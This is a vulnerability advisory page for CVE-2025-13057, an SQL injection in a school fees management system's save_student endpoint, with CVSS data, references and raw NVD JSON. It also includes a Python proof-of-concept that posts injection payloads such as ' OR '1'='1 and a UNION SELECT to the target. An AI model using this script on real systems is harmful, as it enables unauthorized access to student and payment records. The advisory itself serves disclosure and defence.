CVE-2025-13057

Description

A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. Impacted is an unknown function of the file /ajax.php?action=save_student. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:school_fees_payment_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes School Fees Payment Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-13057 PoC - SQL Injection in Campcodes School Fees Payment Management System # Target: /ajax.php?action=save_student def exploit_sql_injection(target_url, payload): """ Exploit SQL injection vulnerability in Campcodes School Fees Payment Management System target_url: Base URL of the vulnerable application payload: SQL injection payload to execute """ # Prepare the malicious request params = { 'action': 'save_student' } # Malicious data with SQL injection in ID parameter data = { 'ID': payload, # SQL injection point 'firstname': 'test', 'lastname': 'test', 'middlename': 'test', 'gender': 'Male', 'dob': '2020-01-01', 'address': 'test', 'email': '[email protected]', 'phone': '1234567890' } try: response = requests.post( f'{target_url}/ajax.php', params=params, data=data, timeout=10 ) return response.text except requests.exceptions.RequestException as e: return f'Request failed: {str(e)}' def basic_authentication_bypass(target_url): """ Basic authentication bypass using common SQL injection techniques """ # Common SQL injection payloads for authentication bypass payloads = [ "' OR '1'='1", "' OR '1'='1' --", "admin' --", "1' UNION SELECT 1,2,3,4,5,6,7,8 --" ] print(f'[*] Testing SQL injection on {target_url}') for payload in payloads: print(f'[*] Testing payload: {payload}') result = exploit_sql_injection(target_url, payload) print(f'[*] Response: {result[:200]}...') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-13057.py <target_url>') print('Example: python cve-2025-13057.py http://target.com/school') sys.exit(1) target = sys.argv[1] basic_authentication_bypass(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13057
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13057
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13057/
[4] VulDB https://vuldb.com/cve/CVE-2025-13057
[5] https://github.com/QingqingOK/CVE/issues/1
[6] https://vuldb.com/?ctiid.332184
[7] https://vuldb.com/?id.332184
[8] https://vuldb.com/?submit.682367
[9] https://www.campcodes.com/
[10] https://github.com/QingqingOK/CVE/issues/1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13057", "sourceIdentifier": "[email protected]", "published": "2025-11-12T19:15:35.607", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Campcodes School Fees Payment Management System 1.0. Impacted is an unknown function of the file /ajax.php?action=save_student. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:school_fees_payment_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "450DC6BC-1A28-40FC-987F-4AA647D910F5"}]}]}], "references": [{"url": "https://github.com/QingqingOK/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332184", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332184", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682367", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/QingqingOK/CVE/issues/1", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}